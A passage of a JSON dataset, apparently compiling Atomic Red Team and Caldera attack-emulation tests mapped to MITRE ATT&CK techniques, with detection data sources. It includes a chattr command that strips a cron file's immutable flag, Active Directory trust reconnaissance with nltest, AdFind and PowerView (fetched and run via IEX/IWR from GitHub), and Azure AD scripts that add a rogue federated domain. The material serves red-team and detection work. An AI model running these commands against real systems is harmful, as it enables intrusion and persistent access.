immutable file attribute", + "auto_generated_guid": "e7469fe2-ad41-4382-8965-99b94dd3c13f", + "description": "Remove's a file's `immutable` attribute using `chattr`.\nThis technique was used by the threat actor Rocke during the compromise of Linux web servers.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "file_to_modify": { + "description": "Path of the file", + "type": "Path", + "default": "/var/spool/cron/root" + } + }, + "executor": { + "command": "chattr -i #{file_to_modify}\n", + "name": "sh" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1482", + "command_list": [ + "dsquery * -filter \"(objectClass=trustedDomain)\" -attr *\n", + "nltest /domain_trusts\n", + "Import-Module \"$env:TEMP\\PowerView.ps1\"\nGet-NetDomainTrust\nGet-NetForestTrust\nGet-ADDomain\nGet-ADGroupMember Administrators -Recursive\n", + "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -f (objectcategory=organizationalUnit)\n", + "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -gcb -sc trustdmp\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainTrust -Verbose\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-ForestTrust -Verbose\n", + "Import-Module .\\powerview.ps1 -Force;\nGet-NetDomain | ConvertTo-Json -Depth 1\n" + ], + "commands": [ + { + "command": "dsquery * -filter \"(objectClass=trustedDomain)\" -attr *\n", + "source": "atomics/T1482/T1482.yaml", + "name": "Atomic Red Team Test - Domain Trust Discovery" + }, + { + "command": "nltest /domain_trusts\n", + "source": "atomics/T1482/T1482.yaml", + "name": "Atomic Red Team Test - Domain Trust Discovery" + }, + { + "command": "Import-Module \"$env:TEMP\\PowerView.ps1\"\nGet-NetDomainTrust\nGet-NetForestTrust\nGet-ADDomain\nGet-ADGroupMember Administrators -Recursive\n", + "source": "atomics/T1482/T1482.yaml", + "name": "Atomic Red Team Test - Domain Trust Discovery" + }, + { + "command": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -f (objectcategory=organizationalUnit)\n", + "source": "atomics/T1482/T1482.yaml", + "name": "Atomic Red Team Test - Domain Trust Discovery" + }, + { + "command": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -gcb -sc trustdmp\n", + "source": "atomics/T1482/T1482.yaml", + "name": "Atomic Red Team Test - Domain Trust Discovery" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainTrust -Verbose\n", + "source": "atomics/T1482/T1482.yaml", + "name": "Atomic Red Team Test - Domain Trust Discovery" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-ForestTrust -Verbose\n", + "source": "atomics/T1482/T1482.yaml", + "name": "Atomic Red Team Test - Domain Trust Discovery" + }, + { + "command": "Import-Module .\\powerview.ps1 -Force;\nGet-NetDomain | ConvertTo-Json -Depth 1\n", + "source": "data/abilities/discovery/6131397e-7765-424e-a594-3d7fb2d93a6a.yml", + "name": "Determine the Windows Domain of a computer" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1482", + "display_name": "Domain Trust Discovery", + "atomic_tests": [ + { + "name": "Windows - Discover domain trusts with dsquery", + "auto_generated_guid": "4700a710-c821-4e17-a3ec-9e4c81d6845f", + "description": "Uses the dsquery command to discover domain trusts.\nRequires the installation of dsquery via Windows RSAT or the Windows Server AD DS role.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "dsquery * -filter \"(objectClass=trustedDomain)\" -attr *\n", + "name": "command_prompt" + } + }, + { + "name": "Windows - Discover domain trusts with nltest", + "auto_generated_guid": "2e22641d-0498-48d2-b9ff-c71e496ccdbe", + "description": "Uses the nltest command to discover domain trusts.\nRequires the installation of nltest via Windows RSAT or the Windows Server AD DS role.\nThis technique has been used by the Trickbot malware family.\n", + "supported_platforms": [ + "windows" + ], + "dependencies": [ + { + "description": "nltest.exe from RSAT must be present on disk\n", + "prereq_command": "WHERE nltest.exe >NUL 2>&1\n", + "get_prereq_command": "echo Sorry RSAT must be installed manually\n" + } + ], + "executor": { + "command": "nltest /domain_trusts\n", + "name": "command_prompt" + } + }, + { + "name": "Powershell enumerate domains and forests", + "auto_generated_guid": "c58fbc62-8a62-489e-8f2d-3565d7d96f30", + "description": "Use powershell to enumerate AD information.\nRequires the installation of PowerShell AD admin cmdlets via Windows RSAT or the Windows Server AD DS role.\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "PowerView PowerShell script must exist on disk\n", + "prereq_command": "if (Test-Path $env:TEMP\\PowerView.ps1) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1\" -OutFile \"$env:TEMP\\PowerView.ps1\"\n" + }, + { + "description": "RSAT PowerShell AD admin cmdlets must be installed\n", + "prereq_command": "if ((Get-Command \"Get-ADDomain\" -ErrorAction Ignore) -And (Get-Command \"Get-ADGroupMember\" -ErrorAction Ignore)) { exit 0 } else { exit 1 }\n", + "get_prereq_command": "Write-Host \"Sorry RSAT must be installed manually\"\n" + } + ], + "executor": { + "command": "Import-Module \"$env:TEMP\\PowerView.ps1\"\nGet-NetDomainTrust\nGet-NetForestTrust\nGet-ADDomain\nGet-ADGroupMember Administrators -Recursive\n", + "name": "powershell" + } + }, + { + "name": "Adfind - Enumerate Active Directory OUs", + "auto_generated_guid": "d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec", + "description": "Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory OUs\nreference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "adfind_path": { + "description": "Path to the AdFind executable", + "type": "Path", + "default": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AdFind.exe must exist on disk at specified location (#{adfind_path})\n", + "prereq_command": "if (Test-Path #{adfind_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe\" -OutFile #{adfind_path}\n" + } + ], + "executor": { + "command": "#{adfind_path} -f (objectcategory=organizationalUnit)\n", + "name": "command_prompt" + } + }, + { + "name": "Adfind - Enumerate Active Directory Trusts", + "auto_generated_guid": "15fe436d-e771-4ff3-b655-2dca9ba52834", + "description": "Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Trusts\nreference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "adfind_path": { + "description": "Path to the AdFind executable", + "type": "Path", + "default": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AdFind.exe must exist on disk at specified location (#{adfind_path})\n", + "prereq_command": "if (Test-Path #{adfind_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe\" -OutFile #{adfind_path}\n" + } + ], + "executor": { + "command": "#{adfind_path} -gcb -sc trustdmp\n", + "name": "command_prompt" + } + }, + { + "name": "Get-DomainTrust with PowerView", + "auto_generated_guid": "f974894c-5991-4b19-aaf5-7cc2fe298c5d", + "description": "Utilizing PowerView, run Get-DomainTrust to identify domain trusts. Upon execution, progress and info about trusts within the domain being scanned will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainTrust -Verbose\n", + "name": "powershell" + } + }, + { + "name": "Get-ForestTrust with PowerView", + "auto_generated_guid": "58ed10e8-0738-4651-8408-3a3e9a526279", + "description": "Utilizing PowerView, run Get-ForestTrust to identify forest trusts. Upon execution, progress and info about forest trusts within the domain being scanned will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-ForestTrust -Verbose\n", + "name": "powershell" + } + } + ] + }, + { + "id": "6131397e-7765-424e-a594-3d7fb2d93a6a", + "name": "GetDomain", + "description": "Determine the Windows Domain of a computer", + "tactic": "discovery", + "technique": { + "attack_id": "T1482", + "name": "Domain Trust Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "Import-Module .\\powerview.ps1 -Force;\nGet-NetDomain | ConvertTo-Json -Depth 1\n", + "parsers": { + "plugins.stockpile.app.parsers.json": [ + { + "source": "domain.ad.forest", + "custom_parser_vals": { + "json_key": "Forest", + "json_type": "str" + } + }, + { + "source": "domain.ad.name", + "custom_parser_vals": { + "json_key": "Name", + "json_type": "str" + } + } + ] + }, + "payloads": [ + "powerview.ps1" + ] + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "command", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "script" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ] + ] + }, + { + "technique_id": "T1484.002", + "command_list": [ + "Import-Module AzureADPreview\n$PWord = ConvertTo-SecureString -String \"#{azure_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"bruce.wayne@contosocloud.com\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n$federationSettings = New-Object Microsoft.Open.AzureAD.Model.DomainFederationSettings\n$federationSettings.ActiveLogOnUri = \"#{active_logon_uri}\"\n$federationSettings.IssuerUri = \"#{issuer_uri}\"\n$federationSettings.LogOffUri = $federationSettings.ActiveLogOnUri\n$federationSettings.MetadataExchangeUri = \"#{metadata_uri}\"\n$federationSettings.PassiveLogOnUri = $federationSettings.ActiveLogOnUri\n$federationSettings.PreferredAuthenticationProtocol = \"WsFed\"\n$federationSettings.SigningCertificate = \"#{public_key}\"\n$new = New-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\" -FederationSettings $federationSettings\nif ($new) { Write-Host \"`nFederation successfully added to Azure AD\" } else { Write-Host \"`nThe federation setup failed\" }\nGet-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\"\nWrite-Host \"End of federation configuration.\"\n", + "Import-Module AzureADPreview\n$PWord = ConvertTo-SecureString -String \"iamthebatman\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{azure_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n$federationSettings = New-Object Microsoft.Open.AzureAD.Model.DomainFederationSettings\n$federationSettings.ActiveLogOnUri = \"#{active_logon_uri}\"\n$federationSettings.IssuerUri = \"#{issuer_uri}\"\n$federationSettings.LogOffUri = $federationSettings.ActiveLogOnUri\n$federationSettings.MetadataExchangeUri = \"#{metadata_uri}\"\n$federationSettings.PassiveLogOnUri = $federationSettings.ActiveLogOnUri\n$federationSettings.PreferredAuthenticationProtocol = \"WsFed\"\n$federationSettings.SigningCertificate = \"#{public_key}\"\n$new = New-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\" -FederationSettings $federationSettings\nif ($new) { Write-Host \"`nFederation successfully added to Azure AD\" } else { Write-Host \"`nThe federation setup failed\" }\nGet-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\"\nWrite-Host \"End of federation configuration.\"\n", + "Import-Module AzureADPreview\n$PWord = ConvertTo-SecureString -String \"#{azure_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{azure_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n$federationSettings = New-Object Microsoft.Open.AzureAD.Model.DomainFederationSettings\n$federationSettings.ActiveLogOnUri = \"https://sts.contoso.com/adfs/ls/\"\n$federationSettings.IssuerUri = \"#{issuer_uri}\"\n$federationSettings.LogOffUri = $federationSettings.ActiveLogOnUri\n$federationSettings.MetadataExchangeUri = \"#{metadata_uri}\"\n$federationSettings.PassiveLogOnUri = $federationSettings.ActiveLogOnUri\n$federationSettings.PreferredAuthenticationProtocol = \"WsFed\"\n$federationSettings.SigningCertificate = \"#{public_key}\"\n$new = New-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\" -FederationSettings $federationSettings\nif ($new) { Write-Host \"`nFederation successfully added to Azure AD\" } else { Write-Host \"`nThe federation setup failed\" }\nGet-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\"\nWrite-Host \"End of federation configuration.\"\n", + "Import-Module AzureADPreview\n$PWord = ConvertTo-SecureString -String \"#{azure_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{azure_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n$federationSettings = New-Object Microsoft.Open.AzureAD.Model.DomainFederationSettings\n$federationSettings.ActiveLogOnUri = \"#{active_logon_uri}\"\n$federationSettings.IssuerUri = \"http://sts.contoso.com/adfs/services/trust\"\n$federationSettings.LogOffUri = $federationSettings.ActiveLogOnUri\n$federationSettings.MetadataExchangeUri = \"#{metadata_uri}\"\n$federationSettings.PassiveLogOnUri = $federationSettings.ActiveLogOnUri\n$federationSettings.PreferredAuthenticationProtocol = \"WsFed\"\n$federationSettings.SigningCertificate = \"#{public_key}\"\n$new = New-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\" -FederationSettings $federationSettings\nif ($new) { Write-Host \"`nFederation successfully added to Azure AD\" } else { Write-Host \"`nThe federation setup failed\" }\nGet-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\"\nWrite-Host \"End of federation configuration.\"\n", + "Import-Module AzureADPreview\n$PWord = ConvertTo-SecureString -String \"#{azure_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{azure_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n$federationSettings = New-Object Microsoft.Open.AzureAD.Model.DomainFederationSettings\n$federationSettings.ActiveLogOnUri = \"#{active_logon_uri}\"\n$federationSettings.IssuerUri = \"#{issuer_uri}\"\n$federationSettings.LogOffUri = $federationSettings.ActiveLogOnUri\n$federationSettings.MetadataExchangeUri = \"https://sts.contoso.com/adfs/services/trust/mex\"\n$federationSettings.PassiveLogOnUri = $federationSettings.ActiveLogOnUri\n$federationSettings.PreferredAuthenticationProtocol = \"WsFed\"\n$federationSettings.SigningCertificate = \"#{public_key}\"\n$new = New-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\" -FederationSettings $federationSettings\nif ($new) { Write-Host \"`nFederation successfully added to Azure AD\" } else { Write-Host \"`nThe federation setup failed\" }\nGet-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\"\nWrite-Host \"End of federation configuration.\"\n", + "Import-Module AzureADPreview\n$PWord = ConvertTo-SecureString -String \"#{azure_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{azure_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n$federationSettings = New-Object Microsoft.Open.AzureAD.Model.DomainFederationSettings\n$federationSettings.ActiveLogOnUri = \"#{active_logon_uri}\"\n$federationSettings.IssuerUri = \"#{issuer_uri}\"\n$federationSettings.LogOffUri = $federationSettings.ActiveLogOnUri\n$federationSettings.MetadataExchangeUri = \"#{metadata_uri}\"\n$federationSettings.PassiveLogOnUri = $federationSettings.ActiveLogOnUri\n$federationSettings.PreferredAuthenticationProtocol = \"WsFed\"\n$federationSettings.SigningCertificate = \"MzAgODIgMDEgMGEgMD...gZWQgOTkgMDIgMDMgMDEgMDAgMDE=\"\n$new = New-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\" -FederationSettings $federationSettings\nif ($new) { Write-Host \"`nFederation successfully added to Azure AD\" } else { Write-Host \"`nThe federation setup failed\" }\nGet-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\"\nWrite-Host \"End of federation configuration.\"\n", + "Import-Module AzureADPreview\n$PWord = ConvertTo-SecureString -String \"#{azure_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{azure_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n$federationSettings = New-Object Microsoft.Open.AzureAD.Model.DomainFederationSettings\n$federationSettings.ActiveLogOnUri = \"#{active_logon_uri}\"\n$federationSettings.IssuerUri = \"#{issuer_uri}\"\n$federationSettings.LogOffUri = $federationSettings.ActiveLogOnUri\n$federationSettings.MetadataExchangeUri = \"#{metadata_uri}\"\n$federationSettings.PassiveLogOnUri = $federationSettings.ActiveLogOnUri\n$federationSettings.PreferredAuthenticationProtocol = \"WsFed\"\n$federationSettings.SigningCertificate = \"#{public_key}\"\n$new = New-AzureADExternalDomainFederation -ExternalDomainName \"contoso.com\" -FederationSettings $federationSettings\nif ($new) { Write-Host \"`nFederation successfully added to Azure AD\" } else { Write-Host \"`nThe federation setup failed\" }\nGet-AzureADExternalDomainFederation -ExternalDomainName \"contoso.com\"\nWrite-Host \"End of federation configuration.\"\n" + ], + "commands": [ + { + "command": "Import-Module AzureADPreview\n$PWord = ConvertTo-SecureString -String \"#{azure_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"bruce.wayne@contosocloud.com\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n$federationSettings = New-Object Microsoft.Open.AzureAD.Model.DomainFederationSettings\n$federationSettings.ActiveLogOnUri = \"#{active_logon_uri}\"\n$federationSettings.IssuerUri = \"#{issuer_uri}\"\n$federationSettings.LogOffUri = $federationSettings.ActiveLogOnUri\n$federationSettings.MetadataExchangeUri = \"#{metadata_uri}\"\n$federationSettings.PassiveLogOnUri = $federationSettings.ActiveLogOnUri\n$federationSettings.PreferredAuthenticationProtocol = \"WsFed\"\n$federationSettings.SigningCertificate = \"#{public_key}\"\n$new = New-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\" -FederationSettings $federationSettings\nif ($new) { Write-Host \"`nFederation successfully added to Azure AD\" } else { Write-Host \"`nThe federation setup failed\" }\nGet-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\"\nWrite-Host \"End of federation configuration.\"\n", + "source": "atomics/T1484.002/T1484.002.yaml", + "name": "Atomic Red Team Test - Domain Trust Modification" + }, + { + "command": "Import-Module AzureADPreview\n$PWord = ConvertTo-SecureString -String \"iamthebatman\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{azure_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n$federationSettings = New-Object Microsoft.Open.AzureAD.Model.DomainFederationSettings\n$federationSettings.ActiveLogOnUri = \"#{active_logon_uri}\"\n$federationSettings.IssuerUri = \"#{issuer_uri}\"\n$federationSettings.LogOffUri = $federationSettings.ActiveLogOnUri\n$federationSettings.MetadataExchangeUri = \"#{metadata_uri}\"\n$federationSettings.PassiveLogOnUri = $federationSettings.ActiveLogOnUri\n$federationSettings.PreferredAuthenticationProtocol = \"WsFed\"\n$federationSettings.SigningCertificate = \"#{public_key}\"\n$new = New-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\" -FederationSettings $federationSettings\nif ($new) { Write-Host \"`nFederation successfully added to Azure AD\" } else { Write-Host \"`nThe federation setup failed\" }\nGet-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\"\nWrite-Host \"End of federation configuration.\"\n", + "source": "atomics/T1484.002/T1484.002.yaml", + "name": "Atomic Red Team Test - Domain Trust Modification" + }, + { + "command": "Import-Module AzureADPreview\n$PWord = ConvertTo-SecureString -String \"#{azure_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{azure_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n$federationSettings = New-Object Microsoft.Open.AzureAD.Model.DomainFederationSettings\n$federationSettings.ActiveLogOnUri = \"https://sts.contoso.com/adfs/ls/\"\n$federationSettings.IssuerUri = \"#{issuer_uri}\"\n$federationSettings.LogOffUri = $federationSettings.ActiveLogOnUri\n$federationSettings.MetadataExchangeUri = \"#{metadata_uri}\"\n$federationSettings.PassiveLogOnUri = $federationSettings.ActiveLogOnUri\n$federationSettings.PreferredAuthenticationProtocol = \"WsFed\"\n$federationSettings.SigningCertificate = \"#{public_key}\"\n$new = New-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\" -FederationSettings $federationSettings\nif ($new) { Write-Host \"`nFederation successfully added to Azure AD\" } else { Write-Host \"`nThe federation setup failed\" }\nGet-AzureADExternalDomainFederation -ExternalDomainName \"#{domain_name}\"\nWrite-Host \"End of federation configuration.\"\n", + "source": "atomics/T1484.002/T1484.002.yaml", + "name": "Atomic Red Team Test - Domain Trust Modification" + }, + { + "command": "Import-Module AzureADPreview\n$PWord = ConvertTo-SecureString -String \"#{azure_password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{azure_username}\", $Pword\nConnect-AzureAD -Credential $Credential > $null\n$federationSettings = New-Object Microsoft.Open.AzureAD.Model.DomainFederationSettings\n$federationSettings.ActiveLogOnUri = \"#{active_logon_uri}\"\n$federationSettings.IssuerUri = \"http://sts.contoso.com/adfs/services/trust\"\n$federationSettings.LogOffUri = $federationSettings.ActiveLogOnUri\n$federationSettings.MetadataExchangeUri = \"#{metadata_uri}\"\n$federationSettings.PassiveLogOnUri = $federationSettings.ActiveLogOnUri\n$federationSettings.PreferredAuthenticationProtocol = \"WsFed\"\n$federationSettings.SigningCertificate = \"#{public_key}\"\n$new = New-AzureADExternalDomainFederation 